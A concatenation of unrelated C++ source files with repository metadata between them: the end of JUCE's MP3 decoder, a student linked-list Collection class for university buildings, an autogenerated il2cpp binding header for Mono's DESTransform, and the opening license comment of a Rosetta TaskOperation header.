*xrpnt = constants.nToThe4Over3[y] * (getOneBit() ? -v : v);
--part2remain;
}
else
*xrpnt = 0;
xrpnt += step;
}
}
for (; l3 && (part2remain > 0); --l3)
{
auto* h = huffmanTables2 + granule.count1TableSelect;
auto* val = h->table;
int16 a;
while ((a = *val++) < 0)
{
if (part2remain <= 0)
{
a = 0;
break;
}
--part2remain;
if (getOneBit())
val -= a;
}
for (int i = 0; i < 4; ++i)
{
if ((i & 1) == 0)
{
if (mc == 0)
{
mc = *map++;
xrpnt = ((float*) xr) + (*map++);
lwin = *map++;
cb = *map++;
if (lwin == 3)
{
v = granule.pow2gain[ (*scf++) << shift];
step = 1;
}
else
{
v = granule.fullGain[lwin][ (*scf++) << shift];
step = 3;
}
}
--mc;
}
if ((a & (8 >> i)))
{
max[lwin] = cb;
if (part2remain == 0)
break;
--part2remain;
*xrpnt = getOneBit() ? -v : v;
}
else
*xrpnt = 0;
xrpnt += step;
}
}
while (map < mapEnd)
{
if (mc == 0)
{
mc = *map++;
xrpnt = ((float*) xr) + *map++;
step = (*map++ == 3) ? 1 : 3;
++map;
}
--mc;
*xrpnt = 0; xrpnt += step;
*xrpnt = 0; xrpnt += step;
}
granule.maxBand[0] = (uint32) (max[0] + 1);
granule.maxBand[1] = (uint32) (max[1] + 1);
granule.maxBand[2] = (uint32) (max[2] + 1);
granule.maxBandl = (uint32) (max[3] + 1);
const int rmax = jmax (max[0], max[1], max[3]) + 1;
granule.maxb = rmax ? (uint32) constants.shortLimit[sampleRate][rmax]
: (uint32) constants.longLimit[sampleRate][max[3] + 1];
}
else
{
static const int pretab1[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 2, 2, 3, 3, 3, 2, 0 };
static const int pretab2[] = { 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 };
auto* pretab = (const int*) (granule.preflag ? pretab1 : pretab2);
int max = -1, cb = 0, mc = 0;
auto* map = constants.map[sampleRate][2];
float v = 0;
for (int i = 0; i < 3; ++i)
{
auto* h = huffmanTables1 + granule.tableSelect[i];
for (int lp = l[i]; lp != 0; --lp, --mc)
{
if (mc == 0)
{
mc = *map++;
v = granule.pow2gain[((*scf++) + (*pretab++)) << shift];
cb = *map++;
}
auto* val = h->table;
int y;
while ((y = *val++) < 0)
{
if (getOneBit()) val -= y;
--part2remain;
}
int x = y >> 4;
y &= 15;
if (x == 15)
{
max = cb;
part2remain -= (int) (h->bits + 1);
x += (int) getBits ((int) h->bits);
*xrpnt++ = constants.nToThe4Over3[x] * (getOneBit() ? -v : v);
}
else if (x)
{
max = cb;
*xrpnt++ = constants.nToThe4Over3[x] * (getOneBit() ? -v : v);
--part2remain;
}
else
*xrpnt++ = 0;
if (y == 15)
{
max = cb;
part2remain -= (int) (h->bits + 1);
y += (int) getBits ((int) h->bits);
*xrpnt++ = constants.nToThe4Over3[y] * (getOneBit() ? -v : v);
}
else if (y)
{
max = cb;
*xrpnt++ = constants.nToThe4Over3[y] * (getOneBit() ? -v : v);
--part2remain;
}
else
*xrpnt++ = 0;
}
}
for (; l3 && part2remain > 0; --l3)
{
auto* h = huffmanTables2 + granule.count1TableSelect;
auto* values = h->table;
int16 a;
while ((a = *values++) < 0)
{
if (part2remain <= 0)
{
a = 0;
break;
}
--part2remain;
if (getOneBit())
values -= a;
}
for (int i = 0; i < 4; ++i)
{
if ((i & 1) == 0)
{
if (mc == 0)
{
mc = *map++;
cb = *map++;
v = granule.pow2gain[((*scf++) + (*pretab++)) << shift];
}
--mc;
}
if ((a & (0x8 >> i)))
{
max = cb;
if (part2remain <= 0)
break;
--part2remain;
*xrpnt++ = getOneBit() ? -v : v;
}
else
*xrpnt++ = 0;
}
}
zeromem (xrpnt, (size_t) (&xr[32][0] - xrpnt) * sizeof (float));
granule.maxBandl = (uint32) (max + 1);
granule.maxb = (uint32) constants.longLimit[sampleRate][granule.maxBandl];
}
while (part2remain > 16)
{
getBits (16);
part2remain -= 16;
}
if (part2remain > 0)
getBits (part2remain);
else if (part2remain < 0)
return true;
return false;
}
void layer3Hybrid (float fsIn[32][18], float tsOut[18][32], int ch, const Layer3SideInfo::Info& granule) noexcept
{
auto* ts = (float*) tsOut;
float* rawout1, *rawout2;
int sb = 0;
{
int b = hybridBlockIndex[ch];
rawout1 = hybridBlock[b][ch];
b = 1 - b;
rawout2 = hybridBlock[b][ch];
hybridBlockIndex[ch] = b;
}
if (granule.mixedBlockFlag)
{
sb = 2;
DCT::dct36 (fsIn[0], rawout1, rawout2, constants.win[0], ts);
DCT::dct36 (fsIn[1], rawout1 + 18, rawout2 + 18, constants.win1[0], ts + 1);
rawout1 += 36;
rawout2 += 36;
ts += 2;
}
auto bt = granule.blockType;
if (bt == 2)
{
for (; sb < (int) granule.maxb; sb += 2, ts += 2, rawout1 += 36, rawout2 += 36)
{
DCT::dct12 (fsIn[sb], rawout1, rawout2, constants.win[2], ts);
DCT::dct12 (fsIn[sb + 1], rawout1 + 18, rawout2 + 18, constants.win1[2], ts + 1);
}
}
else
{
for (; sb < (int) granule.maxb; sb += 2, ts += 2, rawout1 += 36, rawout2 += 36)
{
DCT::dct36 (fsIn[sb], rawout1, rawout2, constants.win[bt], ts);
DCT::dct36 (fsIn[sb + 1], rawout1 + 18, rawout2 + 18, constants.win1[bt], ts + 1);
}
}
for (; sb < 32; ++sb, ++ts)
{
for (int i = 0; i < 18; ++i)
{
ts[i * 32] = *rawout1++;
*rawout2++ = 0;
}
}
}
void synthesiseStereo (const float* bandPtr0, const float* bandPtr1, float* out0, float* out1, int& samplesDone) noexcept
{
auto dummy = samplesDone;
synthesise (bandPtr0, 0, out0, dummy);
synthesise (bandPtr1, 1, out1, samplesDone);
}
void synthesise (const float* bandPtr, int channel, float* out, int& samplesDone)
{
out += samplesDone;
const int bo = channel == 0 ? ((synthBo - 1) & 15) : synthBo;
float (*buf)[0x110] = synthBuffers[channel];
float* b0;
auto bo1 = bo;
if (bo & 1)
{
b0 = buf[0];
DCT::dct64 (buf[1] + ((bo + 1) & 15), buf[0] + bo, bandPtr);
}
else
{
++bo1;
b0 = buf[1];
DCT::dct64 (buf[0] + bo, buf[1] + bo1, bandPtr);
}
synthBo = bo;
const float* window = constants.decodeWin + 16 - bo1;
for (int j = 16; j != 0; --j, b0 += 16, window += 32)
{
auto sum = window[0] * b0[0]; sum -= window[1] * b0[1];
sum += window[2] * b0[2]; sum -= window[3] * b0[3];
sum += window[4] * b0[4]; sum -= window[5] * b0[5];
sum += window[6] * b0[6]; sum -= window[7] * b0[7];
sum += window[8] * b0[8]; sum -= window[9] * b0[9];
sum += window[10] * b0[10]; sum -= window[11] * b0[11];
sum += window[12] * b0[12]; sum -= window[13] * b0[13];
sum += window[14] * b0[14]; sum -= window[15] * b0[15];
*out++ = sum;
}
{
auto sum = window[0] * b0[0]; sum += window[2] * b0[2];
sum += window[4] * b0[4]; sum += window[6] * b0[6];
sum += window[8] * b0[8]; sum += window[10] * b0[10];
sum += window[12] * b0[12]; sum += window[14] * b0[14];
*out++ = sum;
b0 -= 16; window -= 32;
window += bo1 << 1;
}
for (int j = 15; j != 0; --j, b0 -= 16, window -= 32)
{
auto sum = -window[-1] * b0[0]; sum -= window[-2] * b0[1];
sum -= window[-3] * b0[2]; sum -= window[-4] * b0[3];
sum -= window[-5] * b0[4]; sum -= window[-6] * b0[5];
sum -= window[-7] * b0[6]; sum -= window[-8] * b0[7];
sum -= window[-9] * b0[8]; sum -= window[-10] * b0[9];
sum -= window[-11] * b0[10]; sum -= window[-12] * b0[11];
sum -= window[-13] * b0[12]; sum -= window[-14] * b0[13];
sum -= window[-15] * b0[14]; sum -= window[0] * b0[15];
*out++ = sum;
}
samplesDone += 32;
}
JUCE_DECLARE_NON_COPYABLE_WITH_LEAK_DETECTOR (MP3Stream)
};
//==============================================================================
static const char* const mp3FormatName = "MP3 file";
//==============================================================================
class MP3Reader : public AudioFormatReader
{
public:
MP3Reader (InputStream* const in)
: AudioFormatReader (in, mp3FormatName),
stream (*in), currentPosition (0),
decodedStart (0), decodedEnd (0)
{
skipID3();
const int64 streamPos = stream.stream.getPosition();
if (readNextBlock())
{
bitsPerSample = 32;
usesFloatingPointData = true;
sampleRate = stream.frame.getFrequency();
numChannels = (unsigned int) stream.frame.numChannels;
lengthInSamples = findLength (streamPos);
}
}
bool readSamples (int** destSamples, int numDestChannels, int startOffsetInDestBuffer,
int64 startSampleInFile, int numSamples) override
{
jassert (destSamples != nullptr);
if (currentPosition != startSampleInFile)
{
if (! stream.seek ((int) (startSampleInFile / 1152 - 1)))
{
currentPosition = -1;
createEmptyDecodedData();
}
else
{
decodedStart = decodedEnd = 0;
const int64 streamPos = stream.currentFrameIndex * 1152;
int toSkip = (int) (startSampleInFile - streamPos);
jassert (toSkip >= 0);
while (toSkip > 0)
{
if (! readNextBlock())
{
createEmptyDecodedData();
break;
}
const int numReady = decodedEnd - decodedStart;
if (numReady > toSkip)
{
decodedStart += toSkip;
break;
}
toSkip -= numReady;
}
currentPosition = startSampleInFile;
}
}
while (numSamples > 0)
{
if (decodedEnd <= decodedStart && ! readNextBlock())
{
for (int i = numDestChannels; --i >= 0;)
if (destSamples[i] != nullptr)
zeromem (destSamples[i] + startOffsetInDestBuffer, (size_t) numSamples * sizeof (float));
return false;
}
const int numToCopy = jmin (decodedEnd - decodedStart, numSamples);
float* const* const dst = reinterpret_cast<float**> (destSamples);
memcpy (dst[0] + startOffsetInDestBuffer, decoded0 + decodedStart, (size_t) numToCopy * sizeof (float));
if (numDestChannels > 1 && dst[1] != nullptr)
memcpy (dst[1] + startOffsetInDestBuffer, (numChannels < 2 ? decoded0 : decoded1) + decodedStart, (size_t) numToCopy * sizeof (float));
startOffsetInDestBuffer += numToCopy;
decodedStart += numToCopy;
currentPosition += numToCopy;
numSamples -= numToCopy;
}
return true;
}
private:
MP3Stream stream;
int64 currentPosition;
enum { decodedDataSize = 1152 };
float decoded0[decodedDataSize], decoded1[decodedDataSize];
int decodedStart, decodedEnd;
void createEmptyDecodedData() noexcept
{
zeromem (decoded0, sizeof (decoded0));
zeromem (decoded1, sizeof (decoded1));
decodedStart = 0;
decodedEnd = decodedDataSize;
}
bool readNextBlock()
{
for (int attempts = 10; --attempts >= 0;)
{
int samplesDone = 0;
const int result = stream.decodeNextBlock (decoded0, decoded1, samplesDone);
if (result > 0 && stream.stream.isExhausted())
{
createEmptyDecodedData();
return true;
}
if (result <= 0)
{
decodedStart = 0;
decodedEnd = samplesDone;
return result == 0;
}
}
return false;
}
void skipID3()
{
const int64 originalPosition = stream.stream.getPosition();
const uint32 firstWord = (uint32) stream.stream.readInt();
if ((firstWord & 0xffffff) == 0x334449)
{
uint8 buffer[6];
if (stream.stream.read (buffer, 6) == 6
&& buffer[0] != 0xff
&& ((buffer[2] | buffer[3] | buffer[4] | buffer[5]) & 0x80) == 0)
{
const uint32 length = (((uint32) buffer[2]) << 21)
| (((uint32) buffer[3]) << 14)
| (((uint32) buffer[4]) << 7)
| ((uint32) buffer[5]);
stream.stream.skipNextBytes (length);
return;
}
}
stream.stream.setPosition (originalPosition);
}
int64 findLength (int64 streamStartPos)
{
int64 numFrames = stream.numFrames;
if (numFrames <= 0)
{
const int64 streamSize = stream.stream.getTotalLength();
if (streamSize > 0)
{
const int bytesPerFrame = stream.frame.frameSize + 4;
if (bytesPerFrame == 417 || bytesPerFrame == 418)
numFrames = roundToInt ((double) (streamSize - streamStartPos) / 417.95918); // more accurate for 128k
else
numFrames = (streamSize - streamStartPos) / bytesPerFrame;
}
}
return numFrames * 1152;
}
JUCE_DECLARE_NON_COPYABLE_WITH_LEAK_DETECTOR (MP3Reader)
};
}
//==============================================================================
MP3AudioFormat::MP3AudioFormat() : AudioFormat (MP3Decoder::mp3FormatName, ".mp3") {}
MP3AudioFormat::~MP3AudioFormat() {}
Array<int> MP3AudioFormat::getPossibleSampleRates() { return {}; }
Array<int> MP3AudioFormat::getPossibleBitDepths() { return {}; }
bool MP3AudioFormat::canDoStereo() { return true; }
bool MP3AudioFormat::canDoMono() { return true; }
bool MP3AudioFormat::isCompressed() { return true; }
StringArray MP3AudioFormat::getQualityOptions() { return {}; }
AudioFormatReader* MP3AudioFormat::createReaderFor (InputStream* sourceStream, const bool deleteStreamIfOpeningFails)
{
std::unique_ptr<MP3Decoder::MP3Reader> r (new MP3Decoder::MP3Reader (sourceStream));
if (r->lengthInSamples > 0)
return r.release();
if (! deleteStreamIfOpeningFails)
r->input = nullptr;
return nullptr;
}
AudioFormatWriter* MP3AudioFormat::createWriterFor (OutputStream*, double /*sampleRateToUse*/,
unsigned int /*numberOfChannels*/, int /*bitsPerSample*/,
const StringPairArray& /*metadataValues*/, int /*qualityOptionIndex*/)
{
jassertfalse; // not yet implemented!
return nullptr;
}
#endif
} // namespace juce
|
c7da22c02b603483eeca2ff0351e89f40d9af6cf | f0ceb54f42289d473dc5281e89e343a3b85cd0ca | /Collection.cpp | 9391d97cb3c5c1fdc55e90f0e46a5c32be024c9e | [] | no_license | kellyguo11/UW_Path_Finder | ecafb899136756fd284418c501be13ec138f90f6 | 70313e946f5d824323f26c152f9b1c9427622912 | refs/heads/master | 2022-07-14T02:15:33.094131 | 2016-01-31T17:15:41 | 2016-01-31T17:15:41 | null | 0 | 0 | null | null | null | null | UTF-8 | C++ | false | false | 3,396 | cpp | Collection.cpp | #include <string>
#include <vector>
#include "Collection.h"
using namespace std;
Collection::BuildingNotInCollectionException::BuildingNotInCollectionException(string bcode) : code(bcode){} // constructor for building not found in collection exception class
string Collection::BuildingNotInCollectionException::getcode() const { // accessor to get building code of building not found in collection exception class
return code;
}
Collection::ExistingBuildingCodeException::ExistingBuildingCodeException(string bcode) : code(bcode){} // constructor for exception class of building already exist in collection
string Collection::ExistingBuildingCodeException::getcode() const { // accessor to get building code
return code;
}
Collection::FormerExistingCodeException::FormerExistingCodeException(string bcode) : code(bcode){} // constructor for exception class for a building code used by a former building in collection
string Collection::FormerExistingCodeException::getcode() const { // accessor to get the building code from exception class
return code;
}
Collection::Collection() { // default constructor
buildings_ = NULL;
}
Collection::~Collection() { // destructor
delete buildings_;
}
void Collection::insert(string code, string name) { // insert building to collection
bool former = false;
for (int i = 0; i < wreckedBuildings.size(); i++) { // check for if the building code has been used by a former building
if (wreckedBuildings[i] == code) {
former = true;
break;
}
}
if (findBuilding(code) != NULL)
throw ExistingBuildingCodeException(code); // if building code already exists in the collection, throw an exception
else if (former)
throw FormerExistingCodeException(code); // if building code was used by a former building, throw an exception
Building* b1 = new Building(code, name, buildings_); // construct new building node in collection
buildings_ = b1;
}
Building* Collection::getbuildings() const { // accessor - get first building pointer
return buildings_;
}
Building* Collection::findBuilding(string code) const { // find building from collection based on building code
Building* b1 = new Building;
b1 = getbuildings();
if (b1 != NULL) {
while (b1->getbcode().getcode() != code && b1->getnext() != NULL) {
b1 = b1->getnext();
}
if (b1->getbcode().getcode() == code) {
return b1; // return building if found
}
}
return NULL; // return NULL if not found
}
void Collection::remove(string code) { // remove building from collection
if (findBuilding(code) == NULL)
throw BuildingNotInCollectionException(code); // if building cannot be found in collection, throw exception
Building* b1 = new Building;
b1 = buildings_;
if (b1 != NULL && b1->getbcode().getcode() != code) {
while (b1->getnext() != NULL && b1->getnext()->getbcode().getcode() != code) { // find building that needs to be removed
b1 = b1->getnext();
}
if (b1->getnext()->getbcode().getcode() == code) {
Building* b2 = b1->getnext();
b1->setnext(b1->getnext()->getnext());
delete b2;
wreckedBuildings.push_back(b2->getbcode().getcode());
}
}
else { // if building to be removed is first in the list
if (b1->getbcode().getcode() == code) {
Building* b2 = b1;
buildings_ = b1->getnext();
wreckedBuildings.push_back(b2->getbcode().getcode());
delete b2;
}
}
}
|
5151ca04ea9bb6c5f168c5cd7cb5ffa1712632d3 | 1501f50acc22b9e915d04df435210d68e2a907ee | /include/System/Security/Cryptography/DESTransform.hpp | 464429ad6bced1d92300b9bee61cd293c0339996 | [
"Unlicense"
] | permissive | sc2ad/BeatSaber-Quest-Codegen | cd944128d6c7b61f2014f13313d2d6cf424df811 | 4bfd0c0f705e7a302afe6ec1ef996b5b2e3f4600 | refs/heads/master | 2023-03-11T11:07:22.074423 | 2023-02-28T22:15:16 | 2023-02-28T22:15:16 | 285,669,750 | 31 | 25 | Unlicense | 2023-02-28T22:15:18 | 2020-08-06T20:56:01 | C++ | UTF-8 | C++ | false | false | 13,567 | hpp | DESTransform.hpp | // Autogenerated from CppHeaderCreator
// Created by Sc2ad
// =========================================================================
#pragma once
// Begin includes
#include "beatsaber-hook/shared/utils/typedefs.h"
#include "beatsaber-hook/shared/utils/byref.hpp"
// Including type: Mono.Security.Cryptography.SymmetricTransform
#include "Mono/Security/Cryptography/SymmetricTransform.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-properties.hpp"
#include "beatsaber-hook/shared/utils/il2cpp-utils-fields.hpp"
#include "beatsaber-hook/shared/utils/utils.h"
#include "beatsaber-hook/shared/utils/typedefs-array.hpp"
// Completed includes
// Begin forward declares
// Forward declaring namespace: System::Security::Cryptography
namespace System::Security::Cryptography {
// Forward declaring type: SymmetricAlgorithm
class SymmetricAlgorithm;
}
// Completed forward declares
// Type namespace: System.Security.Cryptography
namespace System::Security::Cryptography {
// Forward declaring type: DESTransform
class DESTransform;
}
#include "beatsaber-hook/shared/utils/il2cpp-type-check.hpp"
NEED_NO_BOX(::System::Security::Cryptography::DESTransform);
DEFINE_IL2CPP_ARG_TYPE(::System::Security::Cryptography::DESTransform*, "System.Security.Cryptography", "DESTransform");
// Type namespace: System.Security.Cryptography
namespace System::Security::Cryptography {
// Size: 0x70
#pragma pack(push, 1)
// Autogenerated type: System.Security.Cryptography.DESTransform
// [TokenAttribute] Offset: FFFFFFFF
class DESTransform : public ::Mono::Security::Cryptography::SymmetricTransform {
public:
public:
// private System.Byte[] keySchedule
// Size: 0x8
// Offset: 0x58
::ArrayW<uint8_t> keySchedule;
// Field size check
static_assert(sizeof(::ArrayW<uint8_t>) == 0x8);
// private System.Byte[] byteBuff
// Size: 0x8
// Offset: 0x60
::ArrayW<uint8_t> byteBuff;
// Field size check
static_assert(sizeof(::ArrayW<uint8_t>) == 0x8);
// private System.UInt32[] dwordBuff
// Size: 0x8
// Offset: 0x68
::ArrayW<uint> dwordBuff;
// Field size check
static_assert(sizeof(::ArrayW<uint>) == 0x8);
public:
// Get static field: static readonly System.Int32 KEY_BIT_SIZE
static int _get_KEY_BIT_SIZE();
// Set static field: static readonly System.Int32 KEY_BIT_SIZE
static void _set_KEY_BIT_SIZE(int value);
// Get static field: static readonly System.Int32 KEY_BYTE_SIZE
static int _get_KEY_BYTE_SIZE();
// Set static field: static readonly System.Int32 KEY_BYTE_SIZE
static void _set_KEY_BYTE_SIZE(int value);
// Get static field: static readonly System.Int32 BLOCK_BIT_SIZE
static int _get_BLOCK_BIT_SIZE();
// Set static field: static readonly System.Int32 BLOCK_BIT_SIZE
static void _set_BLOCK_BIT_SIZE(int value);
// Get static field: static readonly System.Int32 BLOCK_BYTE_SIZE
static int _get_BLOCK_BYTE_SIZE();
// Set static field: static readonly System.Int32 BLOCK_BYTE_SIZE
static void _set_BLOCK_BYTE_SIZE(int value);
// Get static field: static private readonly System.UInt32[] spBoxes
static ::ArrayW<uint> _get_spBoxes();
// Set static field: static private readonly System.UInt32[] spBoxes
static void _set_spBoxes(::ArrayW<uint> value);
// Get static field: static private readonly System.Byte[] PC1
static ::ArrayW<uint8_t> _get_PC1();
// Set static field: static private readonly System.Byte[] PC1
static void _set_PC1(::ArrayW<uint8_t> value);
// Get static field: static private readonly System.Byte[] leftRotTotal
static ::ArrayW<uint8_t> _get_leftRotTotal();
// Set static field: static private readonly System.Byte[] leftRotTotal
static void _set_leftRotTotal(::ArrayW<uint8_t> value);
// Get static field: static private readonly System.Byte[] PC2
static ::ArrayW<uint8_t> _get_PC2();
// Set static field: static private readonly System.Byte[] PC2
static void _set_PC2(::ArrayW<uint8_t> value);
// Get static field: static readonly System.UInt32[] ipTab
static ::ArrayW<uint> _get_ipTab();
// Set static field: static readonly System.UInt32[] ipTab
static void _set_ipTab(::ArrayW<uint> value);
// Get static field: static readonly System.UInt32[] fpTab
static ::ArrayW<uint> _get_fpTab();
// Set static field: static readonly System.UInt32[] fpTab
static void _set_fpTab(::ArrayW<uint> value);
// Get instance field reference: private System.Byte[] keySchedule
[[deprecated("Use field access instead!")]] ::ArrayW<uint8_t>& dyn_keySchedule();
// Get instance field reference: private System.Byte[] byteBuff
[[deprecated("Use field access instead!")]] ::ArrayW<uint8_t>& dyn_byteBuff();
// Get instance field reference: private System.UInt32[] dwordBuff
[[deprecated("Use field access instead!")]] ::ArrayW<uint>& dyn_dwordBuff();
// System.Void .ctor(System.Security.Cryptography.SymmetricAlgorithm symmAlgo, System.Boolean encryption, System.Byte[] key, System.Byte[] iv)
// Offset: 0x1BF48BC
template<::il2cpp_utils::CreationType creationType = ::il2cpp_utils::CreationType::Temporary>
static DESTransform* New_ctor(::System::Security::Cryptography::SymmetricAlgorithm* symmAlgo, bool encryption, ::ArrayW<uint8_t> key, ::ArrayW<uint8_t> iv) {
static auto ___internal__logger = ::Logger::get().WithContext("::System::Security::Cryptography::DESTransform::.ctor");
return THROW_UNLESS((::il2cpp_utils::New<DESTransform*, creationType>(symmAlgo, encryption, key, iv)));
}
// static private System.Void .cctor()
// Offset: 0x1BF5CFC
static void _cctor();
// private System.UInt32 CipherFunct(System.UInt32 r, System.Int32 n)
// Offset: 0x1BF5274
uint CipherFunct(uint r, int n);
// static System.Void Permutation(System.Byte[] input, System.Byte[] output, System.UInt32[] permTab, System.Boolean preSwap)
// Offset: 0x1BF54BC
static void Permutation(::ArrayW<uint8_t> input, ::ArrayW<uint8_t> output, ::ArrayW<uint> permTab, bool preSwap);
// static private System.Void BSwap(System.Byte[] byteBuff)
// Offset: 0x1BF580C
static void BSwap(::ArrayW<uint8_t> byteBuff);
// System.Void SetKey(System.Byte[] key)
// Offset: 0x1BF4E74
void SetKey(::ArrayW<uint8_t> key);
// public System.Void ProcessBlock(System.Byte[] input, System.Byte[] output)
// Offset: 0x1BF5890
void ProcessBlock(::ArrayW<uint8_t> input, ::ArrayW<uint8_t> output);
// static System.Byte[] GetStrongKey()
// Offset: 0x1BF4D80
static ::ArrayW<uint8_t> GetStrongKey();
// protected override System.Void ECB(System.Byte[] input, System.Byte[] output)
// Offset: 0x1BF5C48
// Implemented from: Mono.Security.Cryptography.SymmetricTransform
// Base method: System.Void SymmetricTransform::ECB(System.Byte[] input, System.Byte[] output)
void ECB(::ArrayW<uint8_t> input, ::ArrayW<uint8_t> output);
}; // System.Security.Cryptography.DESTransform
#pragma pack(pop)
static check_size<sizeof(DESTransform), 104 + sizeof(::ArrayW<uint>)> __System_Security_Cryptography_DESTransformSizeCheck;
static_assert(sizeof(DESTransform) == 0x70);
}
#include "beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::New_ctor
// Il2CppName: .ctor
// Cannot get method pointer of value based method overload from template for constructor!
// Try using FindMethod instead!
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::_cctor
// Il2CppName: .cctor
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (*)()>(&System::Security::Cryptography::DESTransform::_cctor)> {
static const MethodInfo* get() {
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), ".cctor", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::CipherFunct
// Il2CppName: CipherFunct
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<uint (System::Security::Cryptography::DESTransform::*)(uint, int)>(&System::Security::Cryptography::DESTransform::CipherFunct)> {
static const MethodInfo* get() {
static auto* r = &::il2cpp_utils::GetClassFromName("System", "UInt32")->byval_arg;
static auto* n = &::il2cpp_utils::GetClassFromName("System", "Int32")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "CipherFunct", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{r, n});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::Permutation
// Il2CppName: Permutation
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (*)(::ArrayW<uint8_t>, ::ArrayW<uint8_t>, ::ArrayW<uint>, bool)>(&System::Security::Cryptography::DESTransform::Permutation)> {
static const MethodInfo* get() {
static auto* input = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
static auto* output = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
static auto* permTab = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "UInt32"), 1)->byval_arg;
static auto* preSwap = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "Permutation", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{input, output, permTab, preSwap});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::BSwap
// Il2CppName: BSwap
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (*)(::ArrayW<uint8_t>)>(&System::Security::Cryptography::DESTransform::BSwap)> {
static const MethodInfo* get() {
static auto* byteBuff = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "BSwap", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{byteBuff});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::SetKey
// Il2CppName: SetKey
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (System::Security::Cryptography::DESTransform::*)(::ArrayW<uint8_t>)>(&System::Security::Cryptography::DESTransform::SetKey)> {
static const MethodInfo* get() {
static auto* key = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "SetKey", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{key});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::ProcessBlock
// Il2CppName: ProcessBlock
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (System::Security::Cryptography::DESTransform::*)(::ArrayW<uint8_t>, ::ArrayW<uint8_t>)>(&System::Security::Cryptography::DESTransform::ProcessBlock)> {
static const MethodInfo* get() {
static auto* input = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
static auto* output = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "ProcessBlock", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{input, output});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::GetStrongKey
// Il2CppName: GetStrongKey
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<::ArrayW<uint8_t> (*)()>(&System::Security::Cryptography::DESTransform::GetStrongKey)> {
static const MethodInfo* get() {
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "GetStrongKey", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{});
}
};
// Writing MetadataGetter for method: System::Security::Cryptography::DESTransform::ECB
// Il2CppName: ECB
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (System::Security::Cryptography::DESTransform::*)(::ArrayW<uint8_t>, ::ArrayW<uint8_t>)>(&System::Security::Cryptography::DESTransform::ECB)> {
static const MethodInfo* get() {
static auto* input = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
static auto* output = &il2cpp_functions::array_class_get(::il2cpp_utils::GetClassFromName("System", "Byte"), 1)->byval_arg;
return ::il2cpp_utils::FindMethod(classof(System::Security::Cryptography::DESTransform*), "ECB", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{input, output});
}
};
|
7382537c0daa5166bb0e8f95584a6714ec09eac3 | 5e8d200078e64b97e3bbd1e61f83cb5bae99ab6e | /main/source/src/core/pack/task/operation/TaskOperation.hh | b9a5dc2919606723d7b883c3b8cfe4f3bdff9c21 | [] | no_license | MedicaicloudLink/Rosetta | 3ee2d79d48b31bd8ca898036ad32fe910c9a7a28 | 01affdf77abb773ed375b83cdbbf58439edd8719 | refs/heads/master | 2020-12-07T17:52:01.350906 | 2020-01-10T08:24:09 | 2020-01-10T08:24:09 | 232,757,729 | 2 | 6 | null | null | null | null | UTF-8 | C++ | false | false | 2,408 | hh | TaskOperation.hh | // -*- mode:c++;tab-width:2;indent-tabs-mode:t;show-trailing-whitespace:t;rm-trailing-spaces:t -*-
// vi: set ts=2 noet:
//
// (c) Copyright Rosetta Commons Member Institutions.
// (c) This file is part of the Rosetta software suite and is made available under license.
// (c) The Rosetta software is developed by the contributing members of the Rosetta Commons.
// (c) For more information, see http://www.rosettacommons.org. Questions about this can be
// (c) addressed to University of Washington CoMotion, email: license@uw.edu.
/// @file core/pack/task/operation/TaskOperation.hh
/// @brief An operation to perform on a packer task --
